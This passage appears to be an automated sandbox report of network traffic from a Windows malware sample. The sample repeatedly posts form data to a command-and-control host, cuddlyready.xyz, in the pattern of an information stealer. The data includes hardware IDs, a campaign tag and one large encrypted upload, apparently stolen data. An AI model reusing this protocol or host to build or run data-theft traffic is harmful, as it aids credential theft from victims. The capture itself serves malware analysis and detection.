                                                                                                                                                                              2024-12-23 07:31:34 UTC15331OUTData Raw: 2d 2d 4f 31 4e 32 4f 4f 36 36 44 57 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 33 38 35 46 34 37 43 46 46 44 45 46 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 31 4e 32 4f 4f 36 36 44 57 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 31 4e 32 4f 4f 36 36 44 57 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4f 31 4e 32 4f 4f 36 36
                                                                                                                                                                              Data Ascii: --O1N2OO66DWA6Content-Disposition: form-data; name="hwid"82385F47CFFDEF55AC8923850305D13E--O1N2OO66DWA6Content-Disposition: form-data; name="pid"3--O1N2OO66DWA6Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--O1N2OO66
                                                                                                                                                                              2024-12-23 07:31:34 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: lpQ0/74G6(~`~O
                                                                                                                                                                              2024-12-23 07:31:35 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:35 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=6lp91pjken09h44480jshret5o; expires=Fri, 18 Apr 2025 01:18:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nZXJN13dxsQgCTb2JMlF6lYmzrts2IGubkoSulV9fSnsslpgify4Dkfd8ab6HqjQTSyS8vawR3gC%2FoVn9QllPhCiUNCVgn9818Z1Da7oaD1EpfEV95zTPJaZtUyxTTveZSg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a71ce92d43e3-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1610&rtt_var=620&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21361&delivery_rate=1740166&cwnd=229&unsent_bytes=0&cid=c4e8e435c93e67fd&ts=1162&x=0"
                                                                                                                                                                              2024-12-23 07:31:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-23 07:31:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.1049741172.67.150.1734437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:37 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=ZZ2FAQATDR3FX5
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 1246
                                                                                                                                                                              Host: cuddlyready.xyz
                                                                                                                                                                              2024-12-23 07:31:37 UTC1246OUTData Raw: 2d 2d 5a 5a 32 46 41 51 41 54 44 52 33 46 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 33 38 35 46 34 37 43 46 46 44 45 46 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 5a 32 46 41 51 41 54 44 52 33 46 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 5a 32 46 41 51 41 54 44 52 33 46 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 5a 5a
                                                                                                                                                                              Data Ascii: --ZZ2FAQATDR3FX5Content-Disposition: form-data; name="hwid"82385F47CFFDEF55AC8923850305D13E--ZZ2FAQATDR3FX5Content-Disposition: form-data; name="pid"1--ZZ2FAQATDR3FX5Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--ZZ
                                                                                                                                                                              2024-12-23 07:31:38 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:37 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=irs1u8avj8a815rhl40i6a8ukn; expires=Fri, 18 Apr 2025 01:18:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qW3YklbAZHs8%2Fs8%2FaArtLhdHtrTPP2FrZZs5bkvU5aYWMzawoyZGP5DrrwFqFPRx1EHCHAZ6DRUR8N6LT%2BOCgJ2MIEMDoyLWNleG72A8BiOBxrV5Npe18iEa4jM%2BqooxzE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a72f4bff0f77-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1484&rtt_var=566&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2158&delivery_rate=1967654&cwnd=231&unsent_bytes=0&cid=05b64883bdfcd021&ts=772&x=0"
                                                                                                                                                                              2024-12-23 07:31:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-23 07:31:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.1049752172.67.150.1734437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:39 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=DDNDLNQIKL
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 571289
                                                                                                                                                                              Host: cuddlyready.xyz
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 2d 2d 44 44 4e 44 4c 4e 51 49 4b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 33 38 35 46 34 37 43 46 46 44 45 46 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 44 4e 44 4c 4e 51 49 4b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 44 4e 44 4c 4e 51 49 4b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 44 4e 44 4c 4e 51 49 4b 4c 0d 0a 43 6f
                                                                                                                                                                              Data Ascii: --DDNDLNQIKLContent-Disposition: form-data; name="hwid"82385F47CFFDEF55AC8923850305D13E--DDNDLNQIKLContent-Disposition: form-data; name="pid"1--DDNDLNQIKLContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DDNDLNQIKLCo
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 93 27 40 a9 40 0e e2 c1 95 e4 9a 32 45 40 a8 f2 1b 99 63 7c 6b 7d a6 c1 bb 9b f3 8f b4 d9 49 2f 28 a3 62 6f e8 d1 5f 8c ce fb 9f 20 7a 6e a1 92 67 a7 72 9a 20 1a 76 ba 75 de 64 6e 7b 7d 6e 78 ed 57 b2 2f 0e 68 16 13 00 bb 5b ca 63 4f 1c 0a 51 18 da 27 bd 26 60 bf 1b 0a 2e 84 3e 13 cd a0 bf 31 39 f5 23 f6 a3 e0 3d eb e0 4f 5d 08 78 1f 37 94 01 85 40 ec dd 4c 86 ef 0f 1e d0 ec fb bf fd 49 ff 87 81 f9 01 df c6 7e 78 01 c0 aa b8 b6 75 3e 30 54 0c 51 b8 54 12 8a 3a c9 7a 43 72 9b 73 97 87 23 40 c8 9b fb f5 89 7a 54 c6 62 cd bf 26 b6 10 f5 80 18 e7 67 2c 9e a7 5b e7 62 41 54 c8 6a 64 ca 23 d9 cb b1 3e 63 e2 ee 2a 58 c4 a5 1d 5a 0b fc 63 41 d4 13 d3 2b cf 82 4f 1b 3b 50 cd 97 b1 92 c1 47 ce 24 b7 a5 97 6c 66 7d d1 44 ac 8b bb 52 bd 90 f7 ac 68 08 72 ea 56 36 6d
                                                                                                                                                                              Data Ascii: '@@2E@c|k}I/(bo_ zngr vudn{}nxW/h[cOQ'&`.>19#=O]x7@LI~xu>0TQT:zCrs#@zTb&g,[bATjd#>c*XZcA+O;PG$lf}DRhrV6m
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 66 68 a3 1d 9e d8 a6 22 8d ca d3 9f c1 ee 32 bf 37 33 a8 24 f3 1e 5d 4a 58 05 9e e4 2e a4 8e 06 db 42 34 c3 00 ce ff b0 3f 14 b1 36 ab 05 1c 04 e8 0c f1 6f 7e 70 f1 01 42 34 43 97 13 03 c8 c3 f3 1c 7a 31 1c a2 65 48 c1 af 9a 6d 64 be 91 3a 7f 59 57 71 95 5e 67 01 12 4b 90 0b b5 4b 5a d2 d3 d0 92 47 87 4c 06 27 43 51 65 0a b8 f6 a6 37 4d 1c 89 1c 96 50 fc c3 54 0a 2e 93 4d fa fd d4 16 3b eb a1 10 8b 21 bd a3 bf f1 19 1e a8 4f 4a 20 bd 54 0d d3 e3 76 2c 2a b2 c9 dd da 98 85 76 f2 dc a4 03 eb 7e 5e 5b b8 87 8d 41 a4 03 48 5c 1c ab 7e fc e7 f9 0f 27 12 85 7a 84 bf 6e 2a 3c 06 b9 4d fc c4 c5 42 fe 14 1a 72 fd 62 37 76 4c 76 fc 53 44 a8 36 b2 4b 24 f0 28 e1 20 5c f2 b5 c6 bf 10 87 40 7c 9b 09 b2 5c 11 08 7f 54 66 7c 50 64 1f 1f 61 49 21 c1 d1 ed 4c a4 97 46 59
                                                                                                                                                                              Data Ascii: fh"273$]JX.B4?6o~pB4Cz1eHmd:YWq^gKKZGL'CQe7MPT.M;!OJ Tv,*v~^[AH\~'zn*<MBrb7vLvSD6K$( \@|\Tf|PdaI!LFY
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 18 8c e6 03 dc 58 55 37 d4 74 10 9b 00 fd da be 88 11 46 86 7f ad be 70 6e 81 c0 db e3 bf 25 d4 74 21 46 61 e1 00 7e 77 af 12 ff 59 7a 56 ab 49 02 e4 7e bc d7 22 22 c0 82 c4 0f 94 3d cc 55 7b 4a d7 1b e8 72 8e e1 47 6d 0b 31 fb fb 31 5a 63 0d 15 6f d1 7b 79 41 57 49 96 ad f7 a1 6b 52 a3 52 07 04 e1 62 90 5a 7a 35 e5 3b dd 20 b0 1d 41 ac e0 99 5f d1 df 2f 19 7e 47 2b cb 59 08 c4 7f 67 8f e9 e3 33 d4 44 a5 7e 73 e2 61 f7 ef a2 d8 16 b0 4e b2 e3 9d c7 2c 4f fd f9 89 c0 f1 31 45 17 de 5d 6a 37 ab 9f 80 f0 6c b4 09 f1 43 17 64 a4 75 4c 72 c0 98 17 40 15 49 51 d1 c1 09 00 f7 46 86 7a 27 66 67 40 ed 12 fb 75 30 ca 96 94 7c e8 98 c7 ba 25 44 5a 28 fa 03 34 f5 d6 55 e3 9b ef eb ee 6a 57 8a 24 c3 c9 e5 8b b0 a0 43 b0 95 54 58 f7 10 20 b2 8e df 0e 1b f8 fe 35 a4 9e
                                                                                                                                                                              Data Ascii: XU7tFpn%t!Fa~wYzVI~""=U{JrGm11Zco{yAWIkRRbZz5; A_/~G+Yg3D~saN,O1E]j7lCduLr@IQFz'fg@u0|%DZ(4UjW$CTX 5
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: d8 2b 4b a5 78 60 bb 37 ff 9f 35 f9 ff af 97 42 b8 73 94 67 1c 01 74 57 63 44 ae 20 31 e1 ef 84 dc f7 ed b9 08 5c 92 2d d9 8c d1 a9 14 57 3b 93 3e 71 70 96 24 89 a0 82 d0 a8 d0 17 87 11 44 4f 48 5d 19 a7 c8 7f 65 35 79 43 4f fb d6 97 b1 af f1 35 cd 45 a7 6f 67 09 0d e3 c0 59 aa 1d 17 30 5f 41 1e 76 f2 90 a1 aa 48 a8 06 ee c1 fb 23 85 a7 ae fb 69 00 47 cc 9f eb e3 3d 15 a8 4d b9 54 34 e8 d4 0f 37 1a eb a7 0c 7f 52 bd 87 54 aa 7d fe 4d 07 d2 96 77 40 01 1e 96 ff 82 42 b3 09 83 ed fa 3c 1f 0d 7f c3 9f ea f6 bf 8f e0 60 20 fa 5f c5 36 66 6b 3f b1 fa 9b 54 5c 6a f1 1e 7b c5 cc d2 cd 8b 92 98 24 32 94 51 81 0a 58 cf c8 bb 7a 8d f7 ed 03 63 cf d5 3d ed e6 f5 76 70 96 e9 1d 7b 96 6e 07 9a 84 85 9e 84 ed 6f 8f 14 f1 96 ae 4e 6b 5d 51 ea 3d d3 34 79 8d fd 26 29 f1
                                                                                                                                                                              Data Ascii: +Kx`75BsgtWcD 1\-W;>qp$DOH]e5yCO5EogY0_AvH#iG=MT47RT}Mw@B<` _6fk?T\j{$2QXzc=vp{noNk]Q=4y&)
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 16 13 0d 87 ce a6 5d e3 d1 d5 50 d6 e4 de 68 e6 a1 6a 29 69 fc a6 00 4a 23 eb 8b 82 0f 17 42 09 40 24 3f 6b 51 cf 67 32 53 09 e3 f1 fd c7 32 94 f6 07 5f bb 0b 0d 0e 54 94 6d 65 a6 84 d5 99 5b fb d1 2b ab 28 d6 cc 80 88 67 7f 91 6a e5 ec dd 55 6f 3b 4d 0c ac 02 5e 45 0a 76 9e 74 80 b7 81 a7 82 93 a5 d1 81 33 93 9d 39 b6 32 ec 11 df b9 b9 b7 39 e5 13 1f 53 b5 b1 06 e0 4c 3a f1 e2 ac a2 93 f0 01 5d ee cf bc d1 0a a1 f8 da 77 3f 43 54 43 c7 cc 59 9d 4b e6 ac 31 19 6e 95 59 fe 48 d8 ec 65 b9 e3 07 7d c3 f8 04 aa 2b a2 f7 5c 95 16 80 2a 4c 5b 1b 4e 66 2a 82 64 37 50 9c bf f7 c4 41 f0 be bf d8 05 0f ea 21 d4 6d 86 13 fb c5 0b 3e 99 08 be de c8 f5 14 79 34 fd 64 f8 d6 45 00 5e 8a d4 bf 7c ea 41 d1 54 da bb d4 bb 70 9e 98 a5 0d db 7e 3f 98 c6 a0 4e 1e 04 fb f4 ec
                                                                                                                                                                              Data Ascii: ]Phj)iJ#B@$?kQg2S2_Tme[+(gjUo;M^Evt3929SL:]w?CTCYK1nYHe}+\*L[Nf*d7PA!m>y4dE^|ATp~?N
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 1b 13 d2 34 85 ca 2f f9 84 21 c9 b1 9d 8c 2f f2 b3 37 6f 53 73 b7 ee 21 a3 ca f7 8d 34 8f d8 46 87 48 0b 76 e4 57 a6 6b f3 c0 ca 5c ca 04 ae 76 d5 89 b0 35 47 b9 8a 23 07 51 b4 b9 60 15 fc 27 1f 74 d9 77 b9 28 91 ad bc 11 29 d8 e8 fe ab 3a 12 d7 5f 52 c5 2d ab 7a e1 c3 5c 2b 1c 64 59 9f fa ab 2e df 00 28 59 01 6b f7 8d 11 81 53 96 e0 b7 13 07 86 98 be b3 55 73 97 fa c2 5a 8f 75 ea 81 1b f4 9a ca 24 7e 60 cf ad 7d d0 9a 2d a3 75 54 2f 70 c6 70 16 90 c6 d8 42 88 0e 3c c2 7a 12 24 0d 19 9e 93 85 5b 16 70 e0 90 ae 3b 44 fa 6d 47 ec 7a 3a 12 c3 5c 08 9f fe 4d 38 35 7c e6 27 49 83 e7 ae a6 40 d0 59 ef e6 77 07 34 cd f2 13 76 5c 5f 9b 58 9a 96 9c ff a9 23 fd 7b f6 86 c1 bb e6 f8 f4 c1 14 ef c3 57 0e 9e 33 18 c8 fd 3a 66 7a 59 e1 da d1 ed 4a 9f e7 fc df 35 77 3d
                                                                                                                                                                              Data Ascii: 4/!/7oSs!4FHvWk\v5G#Q`'tw():_R-z\+dY.(YkSUsZu$~`}-uT/ppB<z$[p;DmGz:\M85|'I@Yw4v\_X#{W3:fzYJ5w=
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 74 ed 48 1e d3 11 ae 2d 9c 7e a4 53 14 bc 10 6a fe 13 2b b9 7f e8 f7 b0 b3 cf da 37 1d 7b 1d 96 8c f2 0f 05 f5 b9 b3 f4 06 dc c6 cd 79 bd f7 48 48 dd 81 10 5b 91 e7 5d 43 a7 17 8f c4 45 de 18 da 31 d2 22 62 c1 8b 67 84 f1 e0 ee 9b 3a 1f 40 89 a4 59 6a 41 11 19 ca f5 32 db 0a de 2c 8c a7 86 ea 84 6c 48 e8 05 7e ec 83 60 3e c7 ac 7d 78 c2 9b 1e b9 a7 3c 38 18 8d ef 51 4f bf bd fe 4d 49 ff 0e 20 16 bb e7 b9 02 a7 47 4a fa 47 e8 15 27 01 05 86 d7 fe 32 a3 3a a3 91 a3 77 05 81 f8 c2 73 86 ab 19 28 92 47 1f 32 af f5 e1 07 5d ed d7 5e 78 3d 27 31 ba f8 10 31 77 ba 04 fa c8 0e 90 7f 13 7e 77 5c 60 6a 15 06 d2 a8 02 18 99 55 a6 ab 81 bc 05 3f db 33 d1 27 05 d0 af 47 6a a7 16 4a b4 6a 83 2f 63 01 8f 6d 89 70 be e8 73 b2 49 98 a8 97 9e 45 71 88 ff ce 2c 1e 1b 96 8a
                                                                                                                                                                              Data Ascii: tH-~Sj+7{yHH[]CE1"bg:@YjA2,lH~`>}x<8QOMI GJG'2:ws(G2]^x='11w~w\`jU?3'GjJj/cmpsIEq,
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 65 c7 fb ac 97 1d 20 a9 31 15 33 a2 21 1c df 44 2a 9e 44 6d 32 7f ad 82 b6 12 4b a3 10 88 c9 88 fd 00 8d 07 59 a2 04 04 7e a8 25 2c 03 1c c1 d3 07 1e d3 1d 40 a6 44 7f 85 7e d8 af 49 8f 45 4e 21 91 3d 0d 16 c4 99 8c 49 da 4e c3 0d dc 6c 60 93 2b 75 fd 5f 93 b0 2f 26 53 b8 ce 08 a7 5d fb 1a 0d 9e a7 14 3d ef 6c b0 f5 40 3d 00 59 f1 97 f7 32 df bf 7f 3e ec 38 ac 10 95 05 93 6f 76 50 bd 33 8d ec 16 cf 19 11 52 a6 63 23 d1 31 fe 5f 68 04 89 88 9e b4 c2 73 5e 2c ed 58 af 7b 08 f1 cf 69 23 16 66 37 bb f5 cf 67 06 09 4d e5 9b 29 fc 58 6c 1e 21 16 40 4b 7b 96 ec 80 ad 1e 09 6f 01 50 22 ff ee 00 27 12 52 6f 8e bd 72 4f a6 d8 bb 7f 90 c1 8f 85 4d ae ab a8 fe 62 bd 06 23 eb 3c d4 77 be ce 64 2e d3 77 ef 46 f0 3e a0 ff 13 fc 1f 76 eb ac 0d fd 7c 02 51 22 42 cf 94 d9
                                                                                                                                                                              Data Ascii: e 13!D*Dm2KY~%,@D~IEN!=INl`+u_/&S]=l@=Y2>8ovP3Rc#1_hs^,X{i#f7gM)Xl!@K{oP"'RorOMb#<wd.wF>v|Q"B
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 5f b0 a5 ce 70 b8 58 01 d7 92 a9 76 37 1a 13 ac 1d 95 6f 5a 0b 2b d5 03 55 8d 1c 03 63 7e 4b d2 da b4 71 f9 f7 5a fb b1 9e 1f e8 b2 0d d4 da 86 a1 33 03 30 3e 21 40 f8 d7 eb 28 14 37 95 0f d9 d7 a1 99 67 4b 95 3f c1 56 be 5e 0d 68 26 f3 f1 bc ec 27 38 13 85 42 01 56 4f 19 a0 fb 45 c1 a7 79 4a 6e 52 ff 8d 1d be 15 43 e9 84 80 e5 41 54 9a 27 f0 7e f6 6f 31 5b aa 83 d9 5c 59 19 10 f0 3c 1c d0 83 46 1d ae 72 2e 02 5a 1f e6 5a b7 30 cb 9f 07 f0 70 76 13 c8 61 6c 7d 88 15 1d 1c e1 5b fa 30 fe c8 b8 27 ef 7f 0d 70 84 59 fc 47 14 d3 fd 57 fd 73 8b 11 c1 25 e4 cc d2 48 cb 04 66 c7 ce 13 53 fc 26 11 75 f8 6d e1 ba bd e5 1a a5 2d bc 09 77 eb 7c 9d 78 df 24 8a ae be a4 3b df 68 a4 07 60 80 c7 48 50 f6 8b b7 ff 66 f9 f7 34 65 73 8d a4 b3 04 ef 2a 41 9a 27 dd d9 9b 73
                                                                                                                                                                              Data Ascii: _pXv7oZ+Uc~KqZ30>!@(7gK?V^h&'8BVOEyJnRCAT'~o1[\Y<Fr.ZZ0pval}[0'pYGWs%HfS&um-w|x$;h`HPf4es*A's
                                                                                                                                                                              2024-12-23 07:31:44 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:43 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=9ctjs2kop0bul2rod8ng4fmg5l; expires=Fri, 18 Apr 2025 01:18:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1LdL25cyruppoisjuokn8qGzv0ift4S3mLv%2FdnSi3hGSvRxKSEeZKW9igTwv5Lcpm4C8%2B2qArq8DYCsz1qX3Hs0LxDwSIMoJZRsQ3NdLCm9voSX9nhbEF79adIRDVdUVj0A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a73f4e1e19c7-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1770&rtt_var=682&sent=339&recv=592&lost=0&retrans=0&sent_bytes=2837&recv_bytes=573827&delivery_rate=1584373&cwnd=146&unsent_bytes=0&cid=0d8c75d86fe40264&ts=4166&x=0"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.1049763172.67.150.1734437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:45 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 88
                                                                                                                                                                              Host: cuddlyready.xyz
                                                                                                                                                                              2024-12-23 07:31:45 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 38 32 33 38 35 46 34 37 43 46 46 44 45 46 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=82385F47CFFDEF55AC8923850305D13E
                                                                                                                                                                              2024-12-23 07:31:46 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:45 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=9mk3g8akmh2rtsj8231cijbglj; expires=Fri, 18 Apr 2025 01:18:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
